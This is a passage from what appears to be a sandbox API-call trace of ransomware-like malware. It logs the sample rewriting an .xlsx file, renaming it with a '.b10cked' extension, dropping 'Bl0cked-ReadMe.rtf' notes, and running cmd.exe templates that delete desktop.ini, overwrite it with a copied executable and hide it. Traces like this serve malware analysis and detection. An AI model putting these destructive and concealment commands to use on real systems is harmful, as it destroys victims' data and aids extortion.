lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x4a8f [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0127.631] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x45a7 [0127.631] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0127.632] SetFilePointer (in: 
hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x4a8f [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0127.632] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x4a8f [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0127.633] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2546, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0127.633] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2546, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=-9542, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2549 [0127.633] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x2546, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x2546, lpOverlapped=0x0) returned 1 [0127.633] SetFilePointer (in: hFile=0x114, lDistanceToMove=-9542, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x2549 [0127.633] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x2546, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x2546, lpOverlapped=0x0) returned 1 [0127.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS0-Nm2046.xlsx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0127.638] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BS0-Nm2046.xlsx", cchWideChar=15, lpMultiByteStr=0x131326c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BS0-Nm2046.xlsx", lpUsedDefaultChar=0x0) returned 15 [0127.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x4a8f [0127.638] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0127.638] CloseHandle (hObject=0x114) returned 1 [0127.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\BS0-Nm2046.xlsx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS") returned 0x48 [0127.639] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.640] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-NM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\BS0-Nm2046.xlsx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x508, dwThreadId=0x82c)) returned 1 [0127.650] CloseHandle (hObject=0x110) returned 1 [0127.650] CloseHandle (hObject=0x114) returned 1 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\", 
cchLength=0x2b | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\") returned 0x2b [0127.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\RAC\\STATEDATA\\", cchCount2=43) returned 3 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0127.650] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0127.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0127.650] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0127.651] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0127.651] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0127.651] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.652] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE 
\"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0127.652] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0127.652] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x83c, dwThreadId=0x84c)) returned 1 [0127.664] CloseHandle (hObject=0x110) returned 1 [0127.664] CloseHandle (hObject=0x114) returned 1 [0127.664] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0xffffffff [0127.664] GetLastError () returned 0x2 [0127.664] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: 
"c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0127.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0127.666] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0127.666] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0127.667] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0127.667] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0127.667] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0127.667] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0127.667] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0127.667] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1") returned 0x3b [0127.668] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x1aa | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\EEBSYM5\\DOCUME~1\\2W7_EW\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") 
returned 0x1aa [0127.668] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0127.668] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & del /f /q \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\desktop.ini\" && attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\"", lpProcessInformation=0x12fb78*(hProcess=0x114, hThread=0x110, dwProcessId=0x87c, dwThreadId=0x8a4)) returned 1 [0127.673] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) 
returned 0x0 [0128.391] CloseHandle (hObject=0x114) returned 1 [0128.391] CloseHandle (hObject=0x110) returned 1 [0128.391] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0128.391] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0128.391] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0128.391] GetTickCount () returned 0x2926f [0128.391] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=18518033491) returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x64\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x70\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x4d\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x75\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x7a\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, 
dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x6e\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x73\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x12fbd8, cbMultiByte=1, lpWideCharStr=0x12ebc0, cchWideChar=2047 | out: lpWideCharStr="\x47\x1d\xfbf8\x12\x8400\x1d\x44cd\xd116\xe5d4\xd341\x655a\xb210") returned 1 [0128.391] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 